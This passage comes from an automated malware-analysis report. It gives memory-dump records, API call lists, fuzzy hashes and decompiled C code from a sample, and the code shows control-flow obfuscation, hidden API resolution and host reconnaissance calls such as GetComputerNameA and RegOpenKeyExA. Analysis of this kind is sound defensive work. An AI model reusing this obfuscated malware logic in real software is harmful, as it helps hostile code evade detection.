                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7cd6
                                                                                                                                                        0x012d7cde
                                                                                                                                                        0x012d7ce8
                                                                                                                                                        0x012d7cec
                                                                                                                                                        0x012d7cf4
                                                                                                                                                        0x012d7cfc
                                                                                                                                                        0x012d7d08
                                                                                                                                                        0x012d7d3d
                                                                                                                                                        0x012d7d4f
                                                                                                                                                        0x012d7d60
                                                                                                                                                        0x012d7d66
                                                                                                                                                        0x012d7d6c
                                                                                                                                                        0x012d7d71
                                                                                                                                                        0x012d7d76
                                                                                                                                                        0x012d7d85
                                                                                                                                                        0x012d7d88
                                                                                                                                                        0x012d7d8e
                                                                                                                                                        0x012d7d93
                                                                                                                                                        0x012d7d98
                                                                                                                                                        0x012d7da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7da9
                                                                                                                                                        0x012d7d11
                                                                                                                                                        0x012d7d2d
                                                                                                                                                        0x012d7d31
                                                                                                                                                        0x012d7d34
                                                                                                                                                        0x012d7d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7c16
                                                                                                                                                        0x012d7c1b
                                                                                                                                                        0x012d7dda
                                                                                                                                                        0x012d7de0
                                                                                                                                                        0x012d7c21
                                                                                                                                                        0x012d7c26
                                                                                                                                                        0x012d7c28
                                                                                                                                                        0x012d7c28
                                                                                                                                                        0x012d7c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7c1b
                                                                                                                                                        0x012d7c10
                                                                                                                                                        0x012d7c32
                                                                                                                                                        0x012d7c7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7c88
                                                                                                                                                        0x012d7e53
                                                                                                                                                        0x012d7e59
                                                                                                                                                        0x012d7c8e
                                                                                                                                                        0x012d7c93
                                                                                                                                                        0x012d7c99
                                                                                                                                                        0x012d7ca8
                                                                                                                                                        0x012d7cac
                                                                                                                                                        0x012d7cb1
                                                                                                                                                        0x012d7cb6
                                                                                                                                                        0x012d7cb6
                                                                                                                                                        0x012d7c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7c88
                                                                                                                                                        0x012d7c39
                                                                                                                                                        0x012d7db6
                                                                                                                                                        0x012d7e8d
                                                                                                                                                        0x012d7e93
                                                                                                                                                        0x012d7e99
                                                                                                                                                        0x012d7e9e
                                                                                                                                                        0x012d7ea3
                                                                                                                                                        0x012d7ea8
                                                                                                                                                        0x012d7eb3
                                                                                                                                                        0x012d7eb6
                                                                                                                                                        0x012d7eb9
                                                                                                                                                        0x012d7eca
                                                                                                                                                        0x012d7ed0
                                                                                                                                                        0x012d7ed6
                                                                                                                                                        0x012d7edb
                                                                                                                                                        0x012d7ede
                                                                                                                                                        0x012d7eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7eec
                                                                                                                                                        0x012d7dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7f11
                                                                                                                                                        0x012d7f11
                                                                                                                                                        0x012d7c44
                                                                                                                                                        0x012d7def
                                                                                                                                                        0x012d7e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7e03
                                                                                                                                                        0x012d7c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7c51

                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 012D7D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: 6a8285695197ad0f4228d7b86f025f18f1fee7acd7b8ee53bccecf1d9e43f5bb
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: 6D8118723297818ADB64CB19E49076EF6A0F388B58F544016EB9EC7B58EF7DC851CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E012DD1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E012DFAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E012DFAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E012DC96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E012DC3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E012DFAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E012DC96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x012dd1d0
                                                                                                                                                        0x012dd1d4
                                                                                                                                                        0x012dd1d7
                                                                                                                                                        0x012dd1da
                                                                                                                                                        0x012dd1df
                                                                                                                                                        0x012dd1e4
                                                                                                                                                        0x012dd1e9
                                                                                                                                                        0x012dd1ef
                                                                                                                                                        0x012dd1f9
                                                                                                                                                        0x012dd1ff
                                                                                                                                                        0x012dd205
                                                                                                                                                        0x012dd20a
                                                                                                                                                        0x012dd210
                                                                                                                                                        0x012dd214
                                                                                                                                                        0x012dd222
                                                                                                                                                        0x012dd225
                                                                                                                                                        0x012dd22f
                                                                                                                                                        0x012dd234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd239
                                                                                                                                                        0x012dd245
                                                                                                                                                        0x012dd2b6
                                                                                                                                                        0x012dd3b4
                                                                                                                                                        0x012dd3be
                                                                                                                                                        0x012dd3c3
                                                                                                                                                        0x012dd3c8
                                                                                                                                                        0x012dd3d4
                                                                                                                                                        0x012dd3da
                                                                                                                                                        0x012dd3e0
                                                                                                                                                        0x012dd3ed
                                                                                                                                                        0x012dd3ef
                                                                                                                                                        0x012dd3f4
                                                                                                                                                        0x012dd403
                                                                                                                                                        0x012dd2bc
                                                                                                                                                        0x012dd2c1
                                                                                                                                                        0x012dd2d6
                                                                                                                                                        0x012dd2d6
                                                                                                                                                        0x012dd2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd2b6
                                                                                                                                                        0x012dd24c
                                                                                                                                                        0x012dd2de
                                                                                                                                                        0x012dd2e3
                                                                                                                                                        0x012dd2eb
                                                                                                                                                        0x012dd2f8
                                                                                                                                                        0x012dd320
                                                                                                                                                        0x012dd320
                                                                                                                                                        0x012dd326
                                                                                                                                                        0x012dd32c
                                                                                                                                                        0x012dd331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd331
                                                                                                                                                        0x012dd2fc
                                                                                                                                                        0x012dd312
                                                                                                                                                        0x012dd319
                                                                                                                                                        0x012dd319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd252
                                                                                                                                                        0x012dd257
                                                                                                                                                        0x012dd261
                                                                                                                                                        0x012dd272
                                                                                                                                                        0x012dd278
                                                                                                                                                        0x012dd27e
                                                                                                                                                        0x012dd283
                                                                                                                                                        0x012dd286
                                                                                                                                                        0x012dd288
                                                                                                                                                        0x012dd288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd257
                                                                                                                                                        0x012dd24c
                                                                                                                                                        0x012dd294
                                                                                                                                                        0x012dd33b
                                                                                                                                                        0x012dd340
                                                                                                                                                        0x012dd348
                                                                                                                                                        0x012dd355
                                                                                                                                                        0x012dd383
                                                                                                                                                        0x012dd383
                                                                                                                                                        0x012dd389
                                                                                                                                                        0x012dd38f
                                                                                                                                                        0x012dd394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd394
                                                                                                                                                        0x012dd359
                                                                                                                                                        0x012dd375
                                                                                                                                                        0x012dd37c
                                                                                                                                                        0x012dd37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd359
                                                                                                                                                        0x012dd29f
                                                                                                                                                        0x012dd39e
                                                                                                                                                        0x012dd3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd3ac
                                                                                                                                                        0x012dd2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: bbbf96c6fed6ddb99ed4e85e44ae21354a02b14b80551ef9daa1ece43a14b978
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 0F512D22328A4586DB248B9EF45422FAB50F389794F58411AEFCA87B59CE7DC442CF05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E012DC450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E012DFAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E012DFAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x012dc450
                                                                                                                                                        0x012dc457
                                                                                                                                                        0x012dc463
                                                                                                                                                        0x012dc469
                                                                                                                                                        0x012dc46f
                                                                                                                                                        0x012dc474
                                                                                                                                                        0x012dc479
                                                                                                                                                        0x012dc47b
                                                                                                                                                        0x012dc480
                                                                                                                                                        0x012dc488
                                                                                                                                                        0x012dc48a
                                                                                                                                                        0x012dc48d
                                                                                                                                                        0x012dc494
                                                                                                                                                        0x012dc49b
                                                                                                                                                        0x012dc4a2
                                                                                                                                                        0x012dc4ac
                                                                                                                                                        0x012dc4b5
                                                                                                                                                        0x012dc4cb
                                                                                                                                                        0x012dc4cf
                                                                                                                                                        0x012dc4d2
                                                                                                                                                        0x012dc4d5
                                                                                                                                                        0x012dc4b5
                                                                                                                                                        0x012dc4e2
                                                                                                                                                        0x012dc4e8
                                                                                                                                                        0x012dc4ee
                                                                                                                                                        0x012dc4f3
                                                                                                                                                        0x012dc4f8
                                                                                                                                                        0x012dc50f
                                                                                                                                                        0x012dc519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: 619a63e334bc4eed442266e9d1eb7817c6b1d0e2d958b2b4734f75773bf68829
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: 2F1106B73243949BE719DF19F340A5EAA51F3A4344F14C139DB4947B44CB78D162CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B6AB8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                        • Opcode ID: 98ec99578ddaa3c9d7266ab374f08f10c5501da80b5d5e44bb4fae79c6d5e467
                                                                                                                                                        • Instruction ID: 92d46fcc34d3f73b3dc30cc6c52c02b6e1fa1737187ab017e2085d8e036a1b97
                                                                                                                                                        • Opcode Fuzzy Hash: 98ec99578ddaa3c9d7266ab374f08f10c5501da80b5d5e44bb4fae79c6d5e467
                                                                                                                                                        • Instruction Fuzzy Hash: EB119DB2B18F42C6F320AF85A4B1539B2A4EB40758F050436E64E4779AEF3CE8318702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B2944, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFD696B2FEA,?,?,00000040,00007FFD696B34DD,?,?,?,?,00007FFD696B2811,?,?,?), ref: 00007FFD696B2999
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 6cc97a963e6884d7f7963e7ba5670dee71c7b68eb39f74fd178502d1c1dd6273
                                                                                                                                                        • Instruction ID: 4ac288b1d1a92f793cc4d74f2861d44c99ec1c775cb5f984383e548638b6daaa
                                                                                                                                                        • Opcode Fuzzy Hash: 6cc97a963e6884d7f7963e7ba5670dee71c7b68eb39f74fd178502d1c1dd6273
                                                                                                                                                        • Instruction Fuzzy Hash: 40F04F84B19B03C2FE556EE295617B452D05FA9B88F0C1430C90E8638AFE1CE4A6C213
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D3998, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                        			E012D3998(void* __rcx) {
				long long _v24;
				void* _v32;
				void* _t7;
				void* _t14;

				_t23 = __rcx + 0xc38;
				_v32 = __rcx + 0xc38;
				_t21 =  *_v32;
				_v24 =  *_v32;
				_t7 = 0x4c523e9f;
				L1:
				while(_t7 != 0xce1a655a) {
					if(_t7 == 0xe5fc5510) {
						return _t7;
					}
					if(_t7 == 0x4c523e9f) {
						_t7 =  ==  ? 0xe5fc5510 : 0xce1a655a;
					}
				}
				r8d = 0x2db58ff7;
				r9d = 0x11;
				E012DFAD7(1, _t14, _t21, _t23);
				_t23 = _v24; // executed
				FindCloseChangeNotification(??); // executed
				_t21 = _v32;
				 *_v32 = 0;
				_t7 = 0xe5fc5510;
				goto L1;
			}







                                                                                                                                                        0x012d399e
                                                                                                                                                        0x012d39a5
                                                                                                                                                        0x012d39af
                                                                                                                                                        0x012d39b2
                                                                                                                                                        0x012d39b7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d39c1
                                                                                                                                                        0x012d39cd
                                                                                                                                                        0x012d3a21
                                                                                                                                                        0x012d3a21
                                                                                                                                                        0x012d39d4
                                                                                                                                                        0x012d39e1
                                                                                                                                                        0x012d39e1
                                                                                                                                                        0x012d39d4
                                                                                                                                                        0x012d39f2
                                                                                                                                                        0x012d39f8
                                                                                                                                                        0x012d39fe
                                                                                                                                                        0x012d3a03
                                                                                                                                                        0x012d3a06
                                                                                                                                                        0x012d3a08
                                                                                                                                                        0x012d3a0d
                                                                                                                                                        0x012d3a14
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 012D3A06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                        • Opcode ID: 0dd30b80a5f1ab3a9b2e5cd07d4aa3f0c016df5fe824151623a1f393323e0c70
                                                                                                                                                        • Instruction ID: c8ba53009015d8b20ccf8297c1c4ac9878c2f42d113c61993a93106d10c34ca6
                                                                                                                                                        • Opcode Fuzzy Hash: 0dd30b80a5f1ab3a9b2e5cd07d4aa3f0c016df5fe824151623a1f393323e0c70
                                                                                                                                                        • Instruction Fuzzy Hash: 61F0CD76738A4586DF209618F44475E26A0F388798F540421EF4DD7754DA68C582DB07
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A438F, Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                        • Opcode ID: 5ffb13a6993b982a2eb95589b6c56fbd6ffc133fe00e69a41accd928428fcfcc
                                                                                                                                                        • Instruction ID: d28ef723bc5996d6601548e5e7a151117032b165cec66bcbdbccbd2db056791d
                                                                                                                                                        • Opcode Fuzzy Hash: 5ffb13a6993b982a2eb95589b6c56fbd6ffc133fe00e69a41accd928428fcfcc
                                                                                                                                                        • Instruction Fuzzy Hash: 62F06501F0DD1581F9694DDBAC6163500A55FD87BCF6D4432EC1DC73A0EDA8DC824742
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFD696A9D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ForwardingKeyboardLayoutNameParentProxyScaleTimeViewport$ApplicationCreateDateFileFillFormatFunction13Function24IndirectMetaModelNamedPathPipeUserWait
                                                                                                                                                        • String ID: pK<$e<
                                                                                                                                                        • API String ID: 3688862046-3389707211
                                                                                                                                                        • Opcode ID: 634206d3ac24be4e6fe5eebe1c54df5ce1c257440756dbd8180be9a067e64399
                                                                                                                                                        • Instruction ID: 0143aa53f617f77b28863816327f2cff3d3fa459110f40192ec5b0c1adb53463
                                                                                                                                                        • Opcode Fuzzy Hash: 634206d3ac24be4e6fe5eebe1c54df5ce1c257440756dbd8180be9a067e64399
                                                                                                                                                        • Instruction Fuzzy Hash: F0B18E36708B85CBD624CF45E49066DB7A1F794B98F908026EA8D47B98DF3DE845CF01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A6DAE, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 252filewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • HBRUSH_UserUnmarshal.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A6E44
                                                                                                                                                        • NdrProxyForwardingFunction24.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A6E9D
                                                                                                                                                        • NdrProxyForwardingFunction13.OLE32 ref: 00007FFD696A6F21
                                                                                                                                                        • CoReactivateObject.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A6F87
                                                                                                                                                        • ExtractIconEx.SHELL32 ref: 00007FFD696A6FAE
                                                                                                                                                        • HMONITOR_UserMarshal.OLE32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A7084
                                                                                                                                                        • DragQueryFileA.SHELL32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A70B9
                                                                                                                                                        • CancelSynchronousIo.KERNEL32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A70E0
                                                                                                                                                        • SetMetaRgn.GDI32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A7126
                                                                                                                                                        • SetMetaRgn.GDI32(?,?,-1C2FAE83,?,?,?,?,?,?,?,00007FFD696AB548), ref: 00007FFD696A7182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ForwardingMetaProxyUser$CancelDragExtractFileFunction13Function24IconMarshalObjectQueryReactivateSynchronousUnmarshal
                                                                                                                                                        • String ID: &~7$knO5$So'
                                                                                                                                                        • API String ID: 2996200542-3724885621
